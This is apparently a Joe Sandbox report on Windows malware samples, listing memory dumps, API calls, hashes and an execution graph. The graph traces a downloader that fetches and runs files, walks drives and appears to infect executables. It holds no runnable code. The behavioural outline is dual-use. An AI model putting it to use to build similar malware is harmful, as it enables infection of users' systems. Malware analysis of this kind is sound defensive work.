                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: FeaturePresentProcessor
                                                                              • String ID:
                                                                              • API String ID: 2325560087-0
                                                                              • Opcode ID: 2220a4ba3a89479e9bbd0cb47d24552195e31f883cd9ef4eeb5350247ffa51f5
                                                                              • Instruction ID: d0d2a17deda6a04e3ef3033654dedaf820bb578dbd7471d7bd74783127029482
                                                                              • Opcode Fuzzy Hash: 2220a4ba3a89479e9bbd0cb47d24552195e31f883cd9ef4eeb5350247ffa51f5
                                                                              • Instruction Fuzzy Hash: AE519EB19002A59BDB26CF56D8CA7AABBF8FB54350F11862AC416EB3D0D7749E00CF50
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00003314,003E2B33), ref: 003E330D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: fc376c9935ad515a5f96d3310dc54b17c394078690b9acf9429af32d1db57df8
                                                                              • Instruction ID: 470c7b37fe9b051e8f3221eb4395661ff1330d3fae478e336509e04f797f6bac
                                                                              • Opcode Fuzzy Hash: fc376c9935ad515a5f96d3310dc54b17c394078690b9acf9429af32d1db57df8
                                                                              • Instruction Fuzzy Hash:
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                              • Instruction ID: 897b14cf30d90aa83cf81123e2e9c6abf5a266ac9eb7f4e3774078465508bdb8
                                                                              • Opcode Fuzzy Hash: 1dc641a110ca9df19878faaf737841f865a9904d38a7bb4b8f4adfe9b60eb3df
                                                                              • Instruction Fuzzy Hash: 82819631624B518FC715CF29C8906AABBE2EFD5314F148A2DD0EA87791D734E84ACB44

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000001), ref: 003E2A7E
                                                                              • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 003E2A89
                                                                              • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001), ref: 003E2A95
                                                                              • __RTC_Initialize.LIBCMT ref: 003E2AAD
                                                                              • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,003E339E), ref: 003E2AC2
                                                                                • Part of subcall function 003E3138: InitializeSListHead.KERNEL32(003E64E0,003E2AD2), ref: 003E313D
                                                                              • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_00002070), ref: 003E2AE0
                                                                              • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 003E2AFB
                                                                              • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003E2B0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                                              • String ID:
                                                                              • API String ID: 1933938900-0
                                                                              • Opcode ID: e1c0faf77b7a3f628e6c2cfb51d8b56275172bfeca53082170fe3bdd7eb1bf7b
                                                                              • Instruction ID: 6bb94364d466cf41d210e9be6dec1ebffb0475adff72cb4bdf4f53542b930e9c
                                                                              • Opcode Fuzzy Hash: e1c0faf77b7a3f628e6c2cfb51d8b56275172bfeca53082170fe3bdd7eb1bf7b
                                                                              • Instruction Fuzzy Hash: A8011454A846F231D8237BFB080FAAF024D4F80B94F450B18B840AF2D3DDAACB4080B7

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 003E2A11: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 003E1B90
                                                                              • GetLastError.KERNEL32 ref: 003E1BA3
                                                                              • GetLastError.KERNEL32 ref: 003E1BAD
                                                                              • _printf.MSPDB140-MSVCRT ref: 003E1BB5
                                                                                • Part of subcall function 003E2040: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,003E1BF7,ERRNO %lu,00000000), ref: 003E2049
                                                                                • Part of subcall function 003E2040: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?,00000000), ref: 003E2064
                                                                              • GetProcAddress.KERNEL32(00000000,LoadLibraryA), ref: 003E1BD5
                                                                              • GetLastError.KERNEL32 ref: 003E1BE4
                                                                              • GetLastError.KERNEL32 ref: 003E1BEA
                                                                              • _printf.MSPDB140-MSVCRT ref: 003E1BF2
                                                                              • memset.VCRUNTIME140(00000000,00000000,00000068,00000068,00000400,00000014), ref: 003E1C64
                                                                              • GetCurrentProcessId.KERNEL32 ref: 003E1C72
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00002510,00000001,00000000,00000000), ref: 003E1D0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$_printf$AddressCreateCurrentHandleModuleProcProcessThread__acrt_iob_func__stdio_common_vfprintfmallocmemset
                                                                              • String ID: ERRNO %lu$kernel32.dll
                                                                              • API String ID: 2494052705-1154148217
                                                                              • Opcode ID: 8c5e423aea6fb2bbb2583869a93bb339bd01bc4e18be6c53cdee5baece6d585c
                                                                              • Instruction ID: eaaa0bc0fd61a0c5ae070aa6767f2925856ae5cb2a2fc33f9ba98e9afed01be2
                                                                              • Opcode Fuzzy Hash: 8c5e423aea6fb2bbb2583869a93bb339bd01bc4e18be6c53cdee5baece6d585c
                                                                              • Instruction Fuzzy Hash: 7D1127B1900794ABD3219F26DC05B57BBF8EB00720F00472DE8418B7C0E7719D048B91
                                                                              APIs
                                                                              • __current_exception.VCRUNTIME140 ref: 003E3353
                                                                              • __current_exception_context.VCRUNTIME140 ref: 003E335D
                                                                              • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 003E3364
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: __current_exception__current_exception_contextterminate
                                                                              • String ID: csm
                                                                              • API String ID: 2542180945-1018135373
                                                                              • Opcode ID: b49b954d45b043b1b30b8fe17f1f21450ab2eecb204abfb03c9ac5754cafbfcd
                                                                              • Instruction ID: d5e24f96adb97e821ebd3eb693c9527ed3b83a66e2fa492b7d1c89e274ca400c
                                                                              • Opcode Fuzzy Hash: b49b954d45b043b1b30b8fe17f1f21450ab2eecb204abfb03c9ac5754cafbfcd
                                                                              • Instruction Fuzzy Hash: 9DF0823A0002A0AB8F335F2B948C919F76CEE9173139A4615D489CB690CB20EF56C6D2
                                                                              APIs
                                                                              • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A19
                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,003E259B,00000010), ref: 003E2A26
                                                                              • _CxxThrowException.VCRUNTIME140(?,003E4BFC), ref: 003E2E1D
                                                                              • _CxxThrowException.VCRUNTIME140(?,003E4C7C), ref: 003E2E3A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.4133837283.00000000003E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.4133813463.00000000003E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133855820.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133873490.00000000003E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133892481.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133912924.00000000003E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.4133935444.00000000003EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3e0000_ib.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionThrow$_callnewhmalloc
                                                                              • String ID:
                                                                              • API String ID: 4113974480-0
                                                                              • Opcode ID: 5dddc52396cc441bb9c44d1e5ab5e680ec1410366edec31dd30beecef9f4045b
                                                                              • Instruction ID: 3aaad65b8a23dc53ce384d11a091a18f0109f53301426d78dee3b8b319914a30
                                                                              • Opcode Fuzzy Hash: 5dddc52396cc441bb9c44d1e5ab5e680ec1410366edec31dd30beecef9f4045b
                                                                              • Instruction Fuzzy Hash: E7F0B4358042ADB78B17FAB7EC4AD9E736C5A00310B504370F924AA5D1EFB0EB5585C0

                                                                              Execution Graph

                                                                              Execution Coverage:33.5%
                                                                              Dynamic/Decrypted Code Coverage:6.7%
                                                                              Signature Coverage:17.2%
                                                                              Total number of Nodes:285
                                                                              Total number of Limit Nodes:11
                                                                              execution_graph 840 cb14e1 841 cb14fd GetModuleHandleA 840->841 842 cb1541 840->842 843 cb151a VirtualQuery 841->843 844 cb1512 841->844 845 cb1573 842->845 848 cb1549 842->848 843->844 844->842 851 cb1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 845->851 847 cb1579 ExitProcess 850 cb1566 848->850 868 cb1af9 848->868 852 cb167a 851->852 853 cb167f 851->853 886 cb139f GetVersionExA 852->886 874 cb1718 GetSystemTimeAsFileTime 853->874 856 cb1686 857 cb16ca 856->857 862 cb16a0 CreateThread 856->862 858 cb16d0 857->858 859 cb16d7 857->859 907 cb1581 858->907 860 cb170f 859->860 861 cb16dd lstrcpy 859->861 860->847 861->847 879 cb2c48 memset 862->879 1123 cb1099 862->1123 867 cb1718 3 API calls 867->857 869 cb1b09 868->869 870 cb1b11 868->870 872 cb1638 188 API calls 869->872 871 cb1b16 CreateThread 870->871 873 cb1b0f 870->873 871->873 1142 cb1638 189 API calls 871->1142 872->873 873->850 875 cb1735 SHSetValueA 874->875 876 cb1754 874->876 878 cb1786 __aulldiv 875->878 877 cb175a SHGetValueA 876->877 876->878 877->878 878->856 913 cb1973 PathFileExistsA 879->913 882 cb2cb2 884 cb2cbb VirtualFree 882->884 885 cb16ba WaitForSingleObject 882->885 883 cb2c8f CreateThread WaitForMultipleObjects 883->882 935 cb2b8c memset GetLogicalDriveStringsA 883->935 884->885 885->867 887 cb14da 886->887 888 cb13cf LookupPrivilegeValueA 886->888 887->853 889 cb13ef 888->889 890 cb13e7 888->890 889->887 1108 cb120e GetModuleHandleA GetProcAddress 889->1108 1103 cb119f GetCurrentProcess OpenProcessToken 890->1103 896 cb1448 GetCurrentProcessId 896->887 897 cb1457 896->897 897->887 898 cb1319 3 API calls 897->898 899 cb147f 898->899 900 cb1319 3 API calls 899->900 901 cb148e 900->901 901->887 902 cb1319 3 API calls 901->902 903 cb14b4 902->903 904 cb1319 3 API calls 903->904 905 cb14c3 904->905 906 cb1319 3 API calls 905->906 906->887 1122 cb185b GetSystemTimeAsFileTime srand rand srand rand 907->1122 909 cb1592 wsprintfA wsprintfA lstrlen CreateFileA 910 cb15fb WriteFile CloseHandle 909->910 911 cb1633 909->911 910->911 912 cb161d ShellExecuteA 910->912 911->860 912->911 914 cb19a0 913->914 916 cb1ac7 913->916 915 cb19af CreateFileA 914->915 917 cb1a28 GetFileSize 915->917 918 cb19c4 Sleep 915->918 916->882 916->883 920 cb1a38 917->920 921 cb1a80 917->921 918->915 919 cb19d5 918->919 934 cb185b GetSystemTimeAsFileTime srand rand srand rand 919->934 920->921 925 cb1a3d VirtualAlloc 920->925 922 cb1a8d CloseHandle 921->922 923 cb1a96 921->923 922->923 926 cb1aad 923->926 927 cb1a9c DeleteFileA 923->927 925->921 929 cb1a53 925->929 926->916 933 cb1ab8 VirtualFree 926->933 927->926 928 cb19da wsprintfA CopyFileA 928->917 931 cb1a0d CreateFileA 928->931 929->921 932 cb1a59 ReadFile 929->932 931->917 931->927 932->921 932->929 933->916 934->928 936 cb2c09 WaitForMultipleObjects 935->936 937 cb2bc8 935->937 939 cb2c2a CreateThread 936->939 940 cb2c3c 936->940 938 cb2bfa lstrlen 937->938 941 cb2bd2 GetDriveTypeA 937->941 942 cb2be3 CreateThread 937->942 938->936 938->937 939->940 946 cb2845 939->946 941->937 941->938 942->938 943 cb2b7d 942->943 956 cb29e2 memset wsprintfA 943->956 1093 cb274a memset memset SHGetSpecialFolderPathA wsprintfA 946->1093 948 cb2878 DeleteFileA 949 cb289a 948->949 950 cb288c VirtualFree 948->950 952 cb28ab 949->952 953 cb28a4 CloseHandle 949->953 950->949 951 cb2692 8 API calls 954 cb2853 951->954 953->952 954->948 954->951 955 cb239d 186 API calls 954->955 955->954 957 cb2a3a memset lstrlen lstrcpyn strrchr 956->957 958 cb2abc memset memset FindFirstFileA 956->958 957->958 959 cb2a88 957->959 970 cb28b8 memset wsprintfA 958->970 959->958 961 cb2a9a lstrcmpiA 959->961 963 cb2aad lstrlen 961->963 964 cb2b74 961->964 963->958 963->961 965 cb2b61 FindNextFileA 966 cb2b6d FindClose 965->966 967 cb2b23 965->967 966->964 968 cb2b35 lstrcmpiA 967->968 969 cb28b8 174 API calls 967->969 968->966 968->967 969->965 971 cb2905 970->971 976 cb2951 memset 970->976 972 cb291b memset wsprintfA 971->972 973 cb2956 strrchr 971->973 971->976 974 cb29e2 180 API calls 972->974 975 cb2967 lstrcmpiA 973->975 973->976 974->976 977 cb297a 975->977 978 cb2988 lstrcmpiA 975->978 976->965 988 cb1e6e 977->988 978->976 980 cb2994 978->980 981 cb29ad strstr 980->981 982 cb29a5 lstrcpy 980->982 983 cb29cb 981->983 984 cb29d3 981->984 982->981 1031 cb239d strstr 983->1031 1053 cb2692 984->1053 989 cb1e7d 988->989 1062 cb1df6 strrchr 989->1062 992 cb2332 996 cb233d UnmapViewOfFile 992->996 997 cb2346 992->997 993 cb1eb0 SetFileAttributesA CreateFileA 993->992 994 cb1edf 993->994 1067 cb1915 994->1067 996->997 999 cb234b CloseHandle 997->999 1000 cb2350 997->1000 999->1000 1001 cb2391 1000->1001 1002 cb2356 CloseHandle 1000->1002 1001->976 1002->1001 1003 cb1f2e 1003->992 1073 cb1c81 1003->1073 1007 cb1f92 1008 cb1c81 2 API calls 1007->1008 1009 cb1f9f 1008->1009 1009->992 1010 cb1af9 169 API calls 1009->1010 1011 cb2024 1009->1011 1014 cb1fc0 1010->1014 1011->992 1012 cb1af9 169 API calls 1011->1012 1013 cb207a 1012->1013 1015 cb1af9 169 API calls 1013->1015 1014->992 1014->1011 1016 cb1af9 169 API calls 1014->1016 1019 cb2090 1015->1019 1017 cb1ffe 1016->1017 1018 cb2013 FlushViewOfFile 1017->1018 1018->1011 1020 cb20bb memset memset 1019->1020 1022 cb20f5 1020->1022 1021 cb1c81 2 API calls 1023 cb21de 1021->1023 1022->1021 1024 cb2226 memcpy UnmapViewOfFile CloseHandle 1023->1024 1078 cb1b8a 1024->1078 1026 cb226e 1086 cb185b GetSystemTimeAsFileTime srand rand srand rand 1026->1086 1028 cb22ab SetFilePointer SetEndOfFile SetFilePointer WriteFile WriteFile 1029 cb1915 3 API calls 1028->1029 1030 cb231f CloseHandle 1029->1030 1030->992 1032 cb2451 CreateFileA GetFileSize 1031->1032 1037 cb23d8 1031->1037 1033 cb2480 1032->1033 1034 cb2675 CloseHandle 1032->1034 1033->1034 1038 cb2499 1033->1038 1035 cb267c RemoveDirectoryA 1034->1035 1036 cb2687 1035->1036 1036->976 1037->1032 1037->1036 1039 cb1915 3 API calls 1038->1039 1040 cb24a4 9 API calls 1039->1040 1088 cb189d memset CreateProcessA 1040->1088 1043 cb255c Sleep memset wsprintfA 1044 cb29e2 163 API calls 1043->1044 1045 cb2597 memset wsprintfA Sleep 1044->1045 1046 cb189d 6 API calls 1045->1046 1047 cb25e4 Sleep CreateFileA 1046->1047 1048 cb1915 3 API calls 1047->1048 1049 cb2610 CloseHandle 1048->1049 1049->1035 1050 cb261e 1049->1050 1050->1035 1051 cb2641 SetFilePointer WriteFile 1050->1051 1051->1035 1052 cb2667 SetEndOfFile 1051->1052 1052->1035 1054 cb26b2 WaitForSingleObject 1053->1054 1055 cb26a2 CreateEventA 1053->1055 1056 cb2708 1054->1056 1057 cb26c1 lstrlen ??2@YAPAXI 1054->1057 1055->1054 1058 cb2736 SetEvent 1056->1058 1060 cb2718 lstrcpy ??3@YAXPAX 1056->1060 1057->1058 1059 cb26da lstrcpy 1057->1059 1058->976 1061 cb26f1 1059->1061 1060->1061 1061->1058 1063 cb1e13 lstrcpy strrchr 1062->1063 1064 cb1e62 1062->1064 1063->1064 1065 cb1e40 lstrcmpiA 1063->1065 1064->992 1064->993 1065->1064 1066 cb1e52 lstrlen 1065->1066 1066->1064 1066->1065 1068 cb1928 1067->1068 1069 cb1924 SetFilePointer CreateFileMappingA MapViewOfFile 1067->1069 1070 cb194f 1068->1070 1071 cb192e memset GetFileTime 1068->1071 1069->992 1069->1003 1070->1069 1072 cb1954 SetFileTime 1070->1072 1071->1069 1072->1069 1074 cb1c9c 1073->1074 1075 cb1c94 1073->1075 1074->1075 1076 cb1cae memset memset 1074->1076 1075->992 1077 cb185b GetSystemTimeAsFileTime srand rand srand rand 1075->1077 1076->1075 1077->1007 1079 cb1b93 1078->1079 1087 cb185b GetSystemTimeAsFileTime srand rand srand rand 1079->1087 1081 cb1bca srand 1082 cb1bd8 rand 1081->1082 1083 cb1c08 1082->1083 1083->1082 1084 cb1c29 memset memcpy lstrcat 1083->1084 1084->1026 1086->1028 1087->1081 1089 cb190c 1088->1089 1090 cb18e0 CloseHandle WaitForSingleObject 1088->1090 1089->1035 1089->1043 1091 cb18fb GetExitCodeProcess 1090->1091 1092 cb1907 CloseHandle 1090->1092 1091->1092 1092->1089 1102 cb185b GetSystemTimeAsFileTime srand rand srand rand 1093->1102 1095 cb27b5 wsprintfA CopyFileA 1096 cb27de wsprintfA 1095->1096 1097 cb2840 1095->1097 1098 cb1973 17 API calls 1096->1098 1097->954 1099 cb280f 1098->1099 1100 cb2813 DeleteFileA 1099->1100 1101 cb2820 CreateFileA 1099->1101 1100->1101 1101->1097 1102->1095 1104 cb1200 CloseHandle 1103->1104 1105 cb11c6 AdjustTokenPrivileges 1103->1105 1104->889 1106 cb11f7 CloseHandle 1105->1106 1107 cb11f6 1105->1107 1106->1104 1107->1106 1109 cb123f GetCurrentProcessId OpenProcess 1108->1109 1110 cb1310 1108->1110 1109->1110 1114 cb1262 1109->1114 1110->887 1117 cb1319 1110->1117 1111 cb12b0 VirtualAlloc 1111->1114 1116 cb12b8 1111->1116 1112 cb12f1 CloseHandle 1112->1110 1113 cb1302 VirtualFree 1112->1113 1113->1110 1114->1111 1114->1112 1115 cb1296 VirtualFree 1114->1115 1114->1116 1115->1111 1116->1112 1118 cb134a 1117->1118 1119 cb132a GetModuleHandleA GetProcAddress 1117->1119 1120 cb1351 memset 1118->1120 1121 cb1363 1118->1121 1119->1118 1119->1121 1120->1121 1121->887 1121->896 1122->909 1124 cb10ba 1123->1124 1125 cb1196 1123->1125 1124->1125 1141 cb185b GetSystemTimeAsFileTime srand rand srand rand 1124->1141 1127 cb1118 wsprintfA wsprintfA URLDownloadToFileA 1128 cb1168 lstrlen Sleep 1127->1128 1129 cb10dc 1127->1129 1128->1124 1132 cb1000 CreateFileA 1129->1132 1133 cb1092 WinExec lstrlen 1132->1133 1134 cb1025 GetFileSize CreateFileMappingA MapViewOfFile 1132->1134 1133->1124 1133->1125 1135 cb107b 1134->1135 1136 cb1057 1134->1136 1138 cb108d CloseHandle 1135->1138 1139 cb1087 CloseHandle 1135->1139 1137 cb1074 UnmapViewOfFile 1136->1137 1140 cb1061 1136->1140 1137->1135 1138->1133 1139->1138 1140->1137 1141->1127 1157 cb2361 1158 cb236b UnmapViewOfFile 1157->1158 1159 cb2374 1157->1159 1158->1159 1160 cb2379 CloseHandle 1159->1160 1161 cb2382 1159->1161 1160->1161 1162 cb2388 CloseHandle 1161->1162 1163 cb2391 1161->1163 1162->1163 1143 cb6076 1144 cb607b 1143->1144 1148 cb60c7 1143->1148 1146 cb60b0 VirtualAlloc 1144->1146 1144->1148 1150 cb61b2 1144->1150 1145 cb615f VirtualFree 1145->1148 1146->1148 1147 cb6198 VirtualFree 1147->1150 1148->1145 1148->1147 1149 cb60d5 VirtualAlloc 1148->1149 1149->1148 1151 cb6389 VirtualProtect 1150->1151 1156 cb62fb 1150->1156 1154 cb63b7 1151->1154 1152 cb63fc VirtualProtect 1153 cb6400 1152->1153 1154->1152 1155 cb63e7 VirtualProtect 1154->1155 1155->1152 1155->1154 1164 cb6014 1165 cb605f 1164->1165 1166 cb6035 GetModuleHandleA 1164->1166 1167 cb604d GetProcAddress 1166->1167 1168 cb6058 1167->1168 1168->1165 1168->1167 1168->1168

                                                                              Callgraph

                                                                              • Executed
                                                                              • Not Executed
                                                                              • Opacity -> Relevance
                                                                              • Disassembly available
                                                                              callgraph 0 Function_00CB274A 4 Function_00CB185B 0->4 17 Function_00CB1973 0->17 1 Function_00CB66C8 28 Function_00CB6B02 1->28 33 Function_00CB6D00 1->33 34 Function_00CB6A84 1->34 2 Function_00CB2C48 2->17 27 Function_00CB2B8C 2->27 3 Function_00CB2845 3->0 41 Function_00CB239D 3->41 43 Function_00CB2692 3->43 5 Function_00CB235D 6 Function_00CB17D0 7 Function_00CB1C68 8 Function_00CB1E6E 8->4 8->7 13 Function_00CB2D60 8->13 14 Function_00CB1AF9 8->14 21 Function_00CB1DF6 8->21 22 Function_00CB1D8A 8->22 23 Function_00CB1B8A 8->23 30 Function_00CB1C81 8->30 35 Function_00CB2D9B 8->35 45 Function_00CB1915 8->45 9 Function_00CB6B63 48 Function_00CB67A4 9->48 51 Function_00CB69B0 9->51 52 Function_00CB6834 9->52 10 Function_00CB29E2 50 Function_00CB28B8 10->50 11 Function_00CB14E1 11->14 49 Function_00CB1638 11->49 12 Function_00CB2361 12->35 14->49 15 Function_00CB6CF8 16 Function_00CB2B7D 16->10 17->4 18 Function_00CB6CF2 18->15 19 Function_00CB2CF0 20 Function_00CB6076 20->1 23->4 24 Function_00CB600A 25 Function_00CB680F 26 Function_00CB120E 27->3 27->16 28->9 29 Function_00CB6001 29->24 31 Function_00CB1581 31->4 32 Function_00CB1000 32->6 33->9 33->18 33->51 34->18 34->25 36 Function_00CB1099 36->4 36->32 37 Function_00CB1319 38 Function_00CB1718 38->19 39 Function_00CB119F 40 Function_00CB139F 40->26 40->37 40->39 41->10 42 Function_00CB189D 41->42 41->45 44 Function_00CB6012 46 Function_00CB6014 47 Function_00CB65A6 49->2 49->6 49->31 49->36 49->38 49->40 50->8 50->10 50->41 50->43 53 Function_00CB6734 53->28 53->33 53->34

                                                                              Control-flow Graph

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                                                              • String ID: %s*$C:\$Documents and Settings
                                                                              • API String ID: 2826467728-110786608
                                                                              • Opcode ID: be36a353cb9deee03c6c014b2a24d1824b1787c1cf4e147cd011448e435c99f8
                                                                              • Instruction ID: eadc9fdceffdfe2c2817102ecde33fa654d0a1dcd365e2589f5d12110b2fc024
